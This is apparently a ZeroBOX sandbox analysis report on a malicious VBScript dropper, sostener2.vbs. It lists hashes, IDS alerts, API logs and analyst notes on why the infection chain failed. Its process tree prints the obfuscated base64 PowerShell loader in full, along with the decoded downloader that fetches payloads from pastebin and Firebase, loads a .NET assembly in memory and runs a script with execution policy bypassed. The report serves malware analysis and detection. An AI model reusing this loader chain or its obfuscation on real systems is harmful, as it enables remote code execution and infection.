Summary | ZeroBOX

sostener2.vbs

Generic Malware Antivirus Hide_URL PowerShell
Category Machine Started Completed
FILE s1_win7_x6401 April 10, 2025, 10:53 a.m. April 10, 2025, 10:57 a.m.
Size 8.5MB
Type Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5 5edb4498d69d24c6d9d620b602c7c349
SHA256 c1c109901c820411fc15e39e32e19ac5e993930021a55689a9ba040d283ed9b5
CRC32 0EB3687F
ssdeep 192:jlPUdjeZvsBef7e3vtEMUETN9Bg/+m6w6RACeCydCc7o:YQb7SOE9i+m6w6RACeC4Cgo
Note: an ssdeep block size of 192 is far below the size-derived starting value for an 8.5MB file; ssdeep only halves the block size that far when the content is so repetitive that it yields almost no trigger points. That usually means most of the 8.5MB is filler and the actual script logic is small — confirm by inspecting the file, and do not treat the Size value as a measure of code volume.
Yara
  • Antivirus - Contains references to security software

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\sostener2.vbs

    2620
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★c★B6★Fg★RwBr★GE★eQBV★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQ
B0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★E0★aQBz★GU★cgBp★GM★bwBy★GQ★aQBv★HM★bwBB★G0★ZQBu★C4★QwBs★GE★cwBz★DE★Jw★n★C★★KQ★u★Ec★ZQB0★E0★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★GU★d★Bo★G8★Z★★o★C★★Jw★n★E0★cwBx★EI★SQBi★Fk★Jw★n★C★★KQ★u★Ek★bgB2★G8★awBl★Cg★I★★k★G4★dQBs★Gw★I★★s★C★★WwBv★GI★agBl★GM★d★Bb★F0★XQ★g★Cg★I★★n★Cc★d★B4★HQ★Lg★1★DI★M★★y★GY★ZgBl★HQ★cwBv★HM★LwBz★GQ★YQBv★Gw★bgB3★G8★Z★★v★GU★ZwBy★G8★ZQBn★C8★N★★x★DU★MgBl★Gc★cgBv★Go★LwBn★HI★bw★u★HQ★ZQBr★GM★dQBi★HQ★aQBi★C8★Lw★6★HM★c★B0★HQ★a★★n★Cc★I★★s★C★★Jw★n★CU★SgBr★FE★YQBz★EQ★ZgBn★HI★V★Bn★CU★Jw★n★C★★L★★g★Cc★JwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★LQ★t★C0★LQ★t★C0★LQ★n★Cc★L★★g★Cc★Jw★w★Cc★Jw★s★C★★Jw★n★DE★Jw★n★Cw★I★★n★Cc★UgBv★GQ★YQ★n★Cc★I★★g★Ck★I★★p★C★★Ow★n★C★★Ow★k★FY★QgBX★Fc★eg★g★D0★I★★o★C★★WwBT★Hk★cwB0★GU★bQ★u★Ek★Tw★u★F★★YQB0★Gg★XQ★6★Do★RwBl★HQ★V★Bl★G0★c★BQ★GE★d★Bo★Cg★KQ★g★Cs★I★★n★GQ★b★Bs★D★★Mw★u★H★★cw★x★Cc★I★★p★C★★Ow★k★E0★TwBE★FI★Zw★g★Hw★I★BP★HU★d★★t★EY★aQBs★GU★I★★t★EY★aQBs★GU★U★Bh★HQ★a★★g★CQ★VgBC★Fc★VwB6★C★★I★★t★GY★bwBy★GM★ZQ★g★Ds★c★Bv★Hc★ZQBy★HM★a★Bl★Gw★b★★g★C0★RQB4★GU★YwB1★HQ★aQBv★G4★U★Bv★Gw★aQBj★Hk★I★BC★Hk★c★Bh★HM★cw★g★C0★RgBp★Gw★ZQ★g★CQ★VgBC★Fc★VwB6★C★★Ow★=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\test22\AppData\Local\Temp\sostener2.vbs');powershell $Yolopolhggobek;

      2744
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.5202ffetsos/sdaolnwod/egroeg/4152egroj/gro.tekcubtib//:sptth'' , ''C:\Users\test22\AppData\Local\Temp\sostener2.vbs'' , ''____________________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"

        2864

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49166 -> 172.67.25.94:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49167 -> 142.250.197.106:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
Note: both alerts are the same SSLBL JA3 rule (SID 906200054) matching the TLS client fingerprint of the PowerShell/.NET client that made the requests, not anything in the downloaded content. The two flows are the script's own downloads — 172.67.25.94 presents a pastebin.com certificate and 142.250.197.106 a Google certificate (see Suricata TLS below), matching the pastebin.com and firebasestorage.googleapis.com requests in the network section. JA3 identifies a client TLS stack, which many unrelated programs share, so the "Tofsee" label should be read as the name attached to that fingerprint in the SSLBL list, not as a family attribution for this sample.

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49166
172.67.25.94:443
C=US, O=Google Trust Services, CN=WR1 CN=pastebin.com 23:0a:6d:10:e8:e5:69:5e:8b:b3:d5:f7:68:b4:87:dc:57:ae:82:c7
TLSv1
192.168.56.101:49167
142.250.197.106:443
C=US, O=Google Trust Services, CN=WE2 CN=upload.video.google.com 62:3a:f6:bd:3a:0b:ed:3b:16:28:ba:75:d2:00:cf:50:37:6c:20:50
Note: both handshakes are reported as TLSv1 even though the stage-2 command line sets SecurityProtocol to Tls12. The console output below shows that assignment throwing ("The possible enumeration values are Ssl3, Tls"), i.e. the sandbox's .NET runtime has no Tls11/Tls12 members in SecurityProtocolType (a pre-4.5 framework), so WebClient fell back to its default protocol. On a current Windows host the same script would negotiate TLS 1.2; do not build network detections around the TLS 1.0 handshake seen here.

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:35
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + [System.Net.ServicePointManager]:: <<<< SecurityProtocol = [System.Net.Securi
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: tyProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = (
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempP
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: ath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: $MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$M
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: ODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace('
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: '$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $F
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: yfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg +=
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.5202ffetsos/sdaolnwod/
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: egroeg/4152egroj/gro.tekcubtib//:sptth'' , ''C:\Users\test22\AppData\Local\Temp
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: \sostener2.vbs'' , ''____________________________________________-------'', ''0
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: '', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll0
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: 3.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPoli
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: cy Bypass -File $VBWWz ;
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000137
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000143
1 1 0

WriteConsoleW

buffer: Exception calling "DownloadString" with "1" argument(s): "The remote server ret
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: urned an error: (400) Bad Request."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:570
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProt
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: ocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/pzXGkayU' ;$IepGQ = ( [Syst
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: em.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.We
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: bClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FileP
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: ath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath()
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [Sy
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: stem.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $Ph
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: rlN.DownloadString <<<< ( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: $MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$M
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: ODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace('
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: '$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $F
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: yfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg +=
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.5202ffetsos/sdaolnwod/
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: egroeg/4152egroj/gro.tekcubtib//:sptth'' , ''C:\Users\test22\AppData\Local\Temp
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: \sostener2.vbs'' , ''____________________________________________-------'', ''0
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: '', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll0
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: 3.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPoli
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: cy Bypass -File $VBWWz ;
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\dll03.ps1:1 char:160
console_handle: 0x0000002f
1 1 0
Note: stage 3 (dll03.ps1) failed before loading anything. Counting through the one-line script assembled in $MODRg (see the pid 2864 command line), char 160 lands on `$ryaeG.replace(`, so $ryaeG — the content of dll02.txt — was null. That is consistent with the second DownloadString call having thrown "(400) Bad Request" above, which leaves dll02.txt empty. [System.AppDomain]::CurrentDomain.Load was therefore never reached and the assembly type MisericordiosoAmen.Class1 / method MsqBIbY never ran, so the behaviour recorded on this page covers only the downloader chain, not the final payload; the PAGE_EXECUTE_READWRITE allocations logged for pid 2744 below are most plausibly the CLR's own JIT heap rather than injected payload code. The powershell instance that executed dll03.ps1 also does not appear in the visible process tree.
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001839d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184550
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001840d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001840d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001840d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00183d10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00184210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001838d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00183dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00183dd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005c0bc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005c0d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005c0d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005c0d40
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x005bff00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features GET method with no useragent header suspicious_request GET https://pastebin.com/raw/pzXGkayU
suspicious_features GET method with no useragent header suspicious_request GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/rodadll.txt?alt=media&token=aa0328ac-1aba-4a7b-89a6-42621f5aa921
request GET https://pastebin.com/raw/pzXGkayU
request GET https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll/rodadll.txt?alt=media&token=aa0328ac-1aba-4a7b-89a6-42621f5aa921
